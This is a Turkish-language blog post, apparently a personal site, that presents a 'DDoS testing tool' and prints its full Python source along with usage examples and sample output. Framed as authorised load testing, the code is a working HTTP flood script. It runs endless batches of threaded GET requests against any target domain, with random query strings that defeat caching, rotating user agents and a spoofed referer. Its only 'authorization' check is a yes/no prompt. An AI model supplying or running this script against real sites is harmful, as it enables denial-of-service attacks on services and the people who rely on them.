DDoS Testing Tool

DDoS Testing Tool
Deneme amaçlı oluşturduğum ve geliştirdiğim bir DDoS test aracı. Sadece eğitim amaçlı kullanım için uygundur.
Amaç ve Etik
Bu araç açıkça SADECE GÜVENLİK TESTİ İÇİN geliştirilmiştir. Bu veya benzer bir aracı kullanmadan önce şunları yapmalısınız:
- Sistem sahibinden açık izin almış olmak
- Yasal çerçeve içinde testler yürütmek
- Sorumlu açıklama ilkelerini takip etmek
- Üretim sistemlerine zarar vermekten kaçınmak
Nasıl Çalışır
Web test aracı, web uygulamalarının artan trafiği nasıl ele aldığını test etmek için meşru görünen HTTP istekleri oluşturur. Güvenlik profesyonellerine şu konularda yardımcı olur:
- Web altyapısındaki potansiyel darboğazları belirleme
- Yük dengeleme etkinliğini test etme
- Yük devretme mekanizmalarını doğrulama
- Stres altında uygulama yanıtını ölçme
Temel Özellikler
- Çok iş parçacıklı tasarım: Verimli bir şekilde paralel istekler oluşturur
- Özelleştirilebilir kullanıcı ajanları: Varsayılan listeyi kullanabilir veya ua.txt’den yükleyebilir
- Detaylı yanıt analizi: Durum kodlarını, başlıkları ve yanıt boyutlarını gösterir
- Yönlendirme takibi: Yapılandırılabilir bir limite kadar HTTP yönlendirmelerini otomatik olarak takip eder
- Kapsamlı raporlama: Saniyedeki istekler ve yanıt bilgileri hakkında gerçek zamanlı istatistikler
Teknik Uygulama
Araç Python ile oluşturulmuştur ve birkaç güçlü kütüphane kullanır:
- http.client: Düşük seviyeli HTTP bağlantıları için
- threading: Paralel istek işleme için
- urllib.parse: Uygun URL işleme için
- requests/colorama/termcolor: Okunabilir, renkli kodlanmış çıktı için
Komut Satırı Argümanları
./webtester -d [hedef] -T [iş parçacığı sayısı] -Request
Seçenekler:
-d <ip|alan adı>
: Hedefinizi belirtin (gerekli)-t <float>
: Soket zaman aşımını ayarlayın (varsayılan: 5.0)-T <int>
: İş parçacığı sayısını ayarlayın (varsayılan: 100)-Request
: İstek hedefini etkinleştirin (gerekli)
Örnek Kullanım Senaryosu
Bir güvenlik ekibi, test ortamında yeni bir web uygulaması dağıtımını test etmek için bu aracı kullanabilir. İstek yükünü kademeli olarak artırarak şunları belirleyebilirler:
- Performansın ne zaman düşmeye başladığı
- Otomatik ölçeklendirme politikalarının ne kadar iyi çalıştığı
- Mimarilerinde herhangi bir darboğaz olup olmadığı
- İzleme sistemlerinin artan yük üzerine düzgün şekilde uyarı verip vermediği
Çıktı Analizi
Bir test sırasında, her istek hakkında detaylı bilgi göreceksiniz:
[*] example.com/api/test?randomstring adresine GET isteği gönderiliyor
[+] İstek 1 başarılı: 200 OK
Yanıt Başlıkları:
Content-Type: application/json
Content-Length: 1024
Server: nginx/1.18.0
Yanıt Boyutu: 1024 bayt
Başarısız istekler veya sunucu hataları açıkça vurgulanır:
[!] İstek 47 sunucu hatası: 503 Service Unavailable
Yanıt Başlıkları:
Retry-After: 30
Content-Type: text/html
Yanıt Boyutu: 287 bayt
Kurulum
Araç otomatik olarak gerekli bağımlılıkları kontrol eder ve yükler. Hem Windows hem de UNIX tabanlı sistemlerde çalışır.
Kod
İşte web test aracının uygulaması:
#!/usr/bin/env python3
version = '1.0'
title = '''
Web Testing Tool | For authorized security testing only
Version: ''' + version + '''
'''
import os
import sys
import time
import string
import signal
import http.client
import urllib.parse
import socket
from socket import gethostbyname
from random import choice, randint
from threading import Thread, Lock
from argparse import ArgumentParser, RawTextHelpFormatter
try:
import requests, colorama
from termcolor import colored, cprint
except ImportError:
print("Installing required modules...")
import os
if os.name == 'posix':
os.system('pip3 install colorama termcolor requests')
elif os.name == 'nt':
os.system('pip install colorama requests termcolor')
print("Please restart the script.")
sys.exit(0)
if os.name == 'nt':
colorama.init()
signal.signal(signal.SIGFPE, signal.SIG_DFL)
def check_tgt(args):
tgt = args.d
try:
ip = gethostbyname(tgt)
except:
sys.exit(cprint('[-] Can\'t resolve host: Unknown host!', 'red'))
return ip
def add_useragent():
uagents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
]
try:
with open("./ua.txt", "r") as fp:
custom_agents = [line.strip() for line in fp if line.strip()]
if custom_agents:
uagents.extend(custom_agents)
except FileNotFoundError:
cprint('[-] No file named \'ua.txt\', using default User-Agents', 'yellow')
return uagents
class Requester(Thread):
def __init__(self, tgt):
Thread.__init__(self)
self.tgt = tgt
self.port = None
self.ssl = False
self.req = []
self.lock = Lock()
self.success_count = 0
self.follow_redirects = True
if not tgt.startswith(('http://', 'https://')):
tgt = 'http://' + tgt
url_type = urllib.parse.urlparse(tgt)
self.target_host = url_type.netloc
self.target_path = url_type.path if url_type.path else '/'
if not self.target_host:
self.target_host = url_type.path
self.target_path = '/'
try:
gethostbyname(self.target_host)
except Exception as e:
print(colored(f"[-] DNS resolution failed for {self.target_host}: {str(e)}", 'red'))
return
if url_type.scheme == 'https':
self.ssl = True
if self.ssl:
self.port = 443
else:
self.port = 80
def header(self):
cachetype = ['no-cache', 'no-store', 'max-age='+str(randint(0, 10)), 'max-stale='+str(randint(0, 100)),
'min-fresh='+str(randint(0, 10)), 'notransform', 'only-if-cache']
acceptEc = ['compress,gzip', '', '*', 'compress;q=0,5, gzip;q=1.0', 'gzip;q=1.0, indentity; q=0.5, *;q=0']
acceptC = ['ISO-8859-1', 'utf-8', 'Windows-1251', 'ISO-8859-2', 'ISO-8859-15']
http_header = {
'User-Agent': choice(add_useragent()),
'Cache-Control': choice(cachetype),
'Accept-Encoding': choice(acceptEc),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Keep-Alive': '42',
'Host': self.target_host,
'Referer': 'http://www.google.com'
}
return http_header
def rand_str(self):
mystr = []
for x in range(3):
chars = tuple(string.ascii_letters + string.digits)
text = (choice(chars) for _ in range(randint(7, 14)))
text = ''.join(text)
mystr.append(text)
return '&'.join(mystr)
def create_url(self):
return self.target_path + '?' + self.rand_str()
def follow_redirect(self, response):
"""Handle a redirect response by getting the new location"""
redirect_location = response.getheader('Location')
if not redirect_location:
return None, None, None
if redirect_location.startswith('/'):
new_host = self.target_host
new_path = redirect_location
new_ssl = self.ssl
else:
parsed = urllib.parse.urlparse(redirect_location)
new_host = parsed.netloc or self.target_host
new_path = parsed.path or '/'
new_ssl = parsed.scheme == 'https'
return new_host, new_path, new_ssl
def run(self):
if not hasattr(self, 'target_host') or not self.target_host:
return
redirect_count = 0
max_redirects = 5 # Limit redirects to prevent infinite loops
current_host = self.target_host
current_path = self.target_path
current_ssl = self.ssl
try:
while redirect_count <= max_redirects:
if current_ssl:
conn = http.client.HTTPSConnection(current_host, 443, timeout=5)
else:
conn = http.client.HTTPConnection(current_host, 80, timeout=5)
self.req.append(conn)
query = self.rand_str()
url = current_path + '?' + query if '?' not in current_path else current_path + '&' + query
http_header = self.header()
http_header['Host'] = current_host
method = "GET"
with self.lock:
if redirect_count == 0:
print(colored(f"[*] Sending {method} request to {current_host}{url}", 'cyan'))
else:
print(colored(f"[*] Following redirect ({redirect_count}/{max_redirects}) to {current_host}{url}", 'cyan'))
conn.request(method, url, None, http_header)
response = conn.getresponse()
status = response.status
with self.lock:
self.success_count += 1
if status in (301, 302, 303, 307, 308): # Redirect status codes
redirect_location = response.getheader('Location', 'No location header')
cprint(f"[*] Request {self.success_count} redirect: {status} {response.reason} -> {redirect_location}", 'blue')
if self.follow_redirects:
response.read()
new_host, new_path, new_ssl = self.follow_redirect(response)
if new_host and new_path is not None and new_ssl is not None:
redirect_count += 1
current_host = new_host
current_path = new_path
current_ssl = new_ssl
conn.close()
continue
else:
cprint(f"[!] Failed to extract redirect location", 'yellow')
break
elif status >= 200 and status < 400:
cprint(f"[+] Request {self.success_count} successful: {status} {response.reason}", 'green')
elif status == 405:
cprint(f"[!] Request {self.success_count} method not allowed: {status} {response.reason}", 'yellow')
elif status >= 400 and status < 500:
cprint(f"[!] Request {self.success_count} client error: {status} {response.reason}", 'yellow')
elif status >= 500:
cprint(f"[!] Request {self.success_count} server error: {status} {response.reason}", 'red')
else:
cprint(f"[?] Request {self.success_count} unknown response: {status} {response.reason}", 'cyan')
headers = [f" {h}: {v}" for h, v in response.getheaders()]
if headers:
cprint(" Response Headers:", 'cyan')
for header in headers:
cprint(header, 'cyan')
response_body = response.read()
content_length = len(response_body)
cprint(f" Response Size: {content_length} bytes", 'cyan')
break
except KeyboardInterrupt:
sys.exit(cprint('[-] Canceled by user', 'red'))
except Exception as e:
with self.lock:
cprint(f"[-] Request failed: {str(e)}", 'red')
finally:
self.closeConnections()
def closeConnections(self):
for conn in self.req:
try:
conn.close()
except:
pass
def main():
parser = ArgumentParser(
usage='./%(prog)s -t [target] -T [number threads]',
formatter_class=RawTextHelpFormatter,
prog='webtester',
description=cprint(title, 'white', attrs=['bold']),
epilog='''
Example:
./%(prog)s -d www.example.com -T 100 -Request
'''
)
options = parser.add_argument_group('options', '')
options.add_argument('-d', metavar='<ip|domain>', default=False, help='Specify your target such an ip or domain name')
options.add_argument('-t', metavar='<float>', default=5.0, help='Set timeout for socket')
options.add_argument('-T', metavar='<int>', default=100, help='Set threads number for connection (default = 100)')
options.add_argument('-Request', action='store_true', help='Enable request target')
args = parser.parse_args()
if not args.d:
parser.print_help()
sys.exit()
add_useragent()
if args.d:
check_tgt(args)
if args.Request:
tgt = args.d
print(colored('[*] Start sending requests to: ', 'blue') + colored(tgt, 'red'))
try:
if not tgt.startswith(('http://', 'https://')):
host = tgt
else:
host = urllib.parse.urlparse(tgt).netloc
if not host:
host = tgt.replace('http://', '').replace('https://', '')
ip = gethostbyname(host)
print(colored(f"[+] Target {host} resolved to {ip}", 'green'))
except Exception as e:
sys.exit(cprint(f"[-] Cannot resolve target host {tgt}: {str(e)}", 'red'))
total_requests = 0
start_time = time.time()
try:
while True:
current_threads = []
for x in range(int(args.T)):
t = Requester(tgt)
t.daemon = True
t.start()
current_threads.append(t)
total_requests += 1
for t in current_threads:
t.join()
elapsed = time.time() - start_time
requests_per_second = total_requests / elapsed if elapsed > 0 else 0
print(colored(f"[*] Progress: {total_requests} total requests sent, {requests_per_second:.2f} req/sec", 'blue'))
except KeyboardInterrupt:
elapsed = time.time() - start_time
requests_per_second = total_requests / elapsed if elapsed > 0 else 0
print(colored(f"\n[*] Summary: {total_requests} total requests sent in {elapsed:.2f} seconds ({requests_per_second:.2f} req/sec)", 'green'))
sys.exit(cprint('[-] Canceled by user', 'red'))
else:
parser.print_help()
print()
sys.exit(cprint('[-] You must choose request type', 'red'))
if __name__ == '__main__':
try:
import pyfiglet
from termcolor import colored, cprint
from tqdm import tqdm
import time
import sys
import os
os.system('cls' if os.name == 'nt' else 'clear')
banner_text = pyfiglet.figlet_format("aliyilmaz.co", font="slant")
for line in banner_text.split('\n'):
print(colored(line, 'cyan', attrs=['bold']))
time.sleep(0.1)
print("\n" + "="*70)
disclaimer = [
"█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█",
"█ DISCLAIMER █",
"█ █",
"█ This tool is for AUTHORIZED SECURITY TESTING ONLY. █",
"█ You MUST have permission to test the target system.█",
"█ █",
"█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█"
]
for line in disclaimer:
if "DISCLAIMER" in line:
print(colored(line, 'red', attrs=['bold']))
elif "AUTHORIZED" in line or "permission" in line:
print(colored(line, 'yellow', attrs=['bold']))
else:
print(colored(line, 'white'))
time.sleep(0.1)
print("\n" + "="*70 + "\n")
print(colored("Initializing security modules...", 'blue'))
for _ in tqdm(range(100), desc="Loading", bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}", colour="green"):
time.sleep(0.01)
print("\n")
proceed = input(colored("» Do you have authorization to test this system? (yes/no): ", 'green', attrs=['bold']))
if proceed.lower() != "yes":
print("\n" + colored("⚠ UNAUTHORIZED ACCESS ATTEMPT DETECTED", 'red', attrs=['bold', 'blink']))
time.sleep(1)
print(colored("⚠ System shutdown initiated...", 'red', attrs=['bold']))
for i in range(5, 0, -1):
sys.stdout.write(colored(f"\r⚠ Exiting in {i} seconds...", 'red', attrs=['bold']))
sys.stdout.flush()
time.sleep(1)
sys.exit(0)
print("\n" + colored("✓ Authorization confirmed. Starting security assessment...", 'green', attrs=['bold']))
time.sleep(1)
print("\n" + "="*70 + "\n")
main()
except ImportError as e:
print(f"Missing required package: {e}")
print("Please install required packages: pip install pyfiglet termcolor tqdm")
sys.exit(1)
except KeyboardInterrupt:
print("\nOperation cancelled by user.")
sys.exit(0)
except Exception as e:
print(f"An unexpected error occurred: {e}")
sys.exit(1)
Unutmayın: büyük güç, büyük sorumluluk gerektirir. Güvenlik test araçlarını etik ve yasal olarak kullanın.